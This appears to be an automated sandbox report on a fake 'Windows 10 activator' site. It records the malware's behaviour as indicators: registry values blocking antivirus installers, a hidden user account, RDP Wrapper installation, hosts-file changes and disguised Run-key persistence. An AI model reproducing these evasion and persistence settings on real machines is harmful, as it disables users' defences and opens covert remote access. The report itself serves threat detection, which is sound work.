Malware Analysis Report

2025-05-05 22:37

Sample ID 250419-znt92svtex
Target https://kms-auto.site/windows-10-activator/
Tags
rms defense_evasion discovery execution lateral_movement persistence privilege_escalation rat themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://kms-auto.site/windows-10-activator/ was found to be: Known bad.

Malicious Activity Summary

rms defense_evasion discovery execution lateral_movement persistence privilege_escalation rat themida trojan

RMS

Rms family

Detected Nirsoft tools

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Grants admin privileges

Remote Service Session Hijacking: RDP Hijacking

Modifies Windows Firewall

Stops running service(s)

Blocks application from running via registry modification

Drops file in Drivers directory

Server Software Component: Terminal Services DLL

Themida packer

Checks BIOS information in registry

Checks computer location settings

Modifies file permissions

Loads dropped DLL

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Modifies WinLogon

Looks up external IP address via web service

Checks whether UAC is enabled

Drops file in System32 directory

Hide Artifacts: Hidden Users

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Permission Groups Discovery: Local Groups

Event Triggered Execution: Netsh Helper DLL

Runs net.exe

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Checks processor information in registry

NTFS ADS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious behavior: LoadsDriver

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-04-19 20:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-19 20:52

Reported

2025-04-19 21:05

Platform

win10ltsc2021-20250410-en

Max time kernel

751s

Max time network

752s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://kms-auto.site/windows-10-activator/

Signatures

RMS

trojan rat rms

Rms family

rms

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\SysWOW64\unsecapp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\SysWOW64\unsecapp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Setup\KMS.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\SysWOW64\unsecapp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Setup\update.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Setup\IP.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Setup\smss.exe N/A

Remote Service Session Hijacking: RDP Hijacking

lateral_movement
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net1.exe N/A

Blocks application from running via registry modification

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" C:\ProgramData\Setup\KMS.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" C:\ProgramData\Setup\KMS.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\ProgramData\Setup\update.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" C:\ProgramData\RDPWinst.exe N/A

Stops running service(s)

defense_evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Setup\IP.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Setup\KMS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Setup\update.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Setup\smss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Setup\smss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Setup\IP.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Setup\KMS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Setup\update.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\update.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\svchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\smss.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\install.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\ProgramData\Setup\IP.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Setup\KMS.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Setup\update.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Setup\IP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Setup\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\unsecapp.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\ProgramData\RDPWinst.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\unsecapp.exe C:\ProgramData\Setup\IP.exe N/A
File opened for modification C:\Windows\SysWOW64\unsecapp.exe C:\ProgramData\Setup\IP.exe N/A
File created C:\Windows\System32\rfxvmt.dll C:\ProgramData\RDPWinst.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\Doctor Web C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Loaris Trojan Remover C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\IObit\Advanced SystemCare C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Moo0 C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Process Lasso C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Process Hacker 2 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\EnigmaSoft C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\QuickCPU C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\ProgramData\RDPWinst.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Transmission C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\RogueKiller C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\CPUID\HWMonitor C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ReasonLabs C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini C:\ProgramData\Setup\smss.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\ProgramData\RDPWinst.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\DrWeb C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\SpeedFan C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\GPU Temp C:\ProgramData\Setup\update.exe N/A
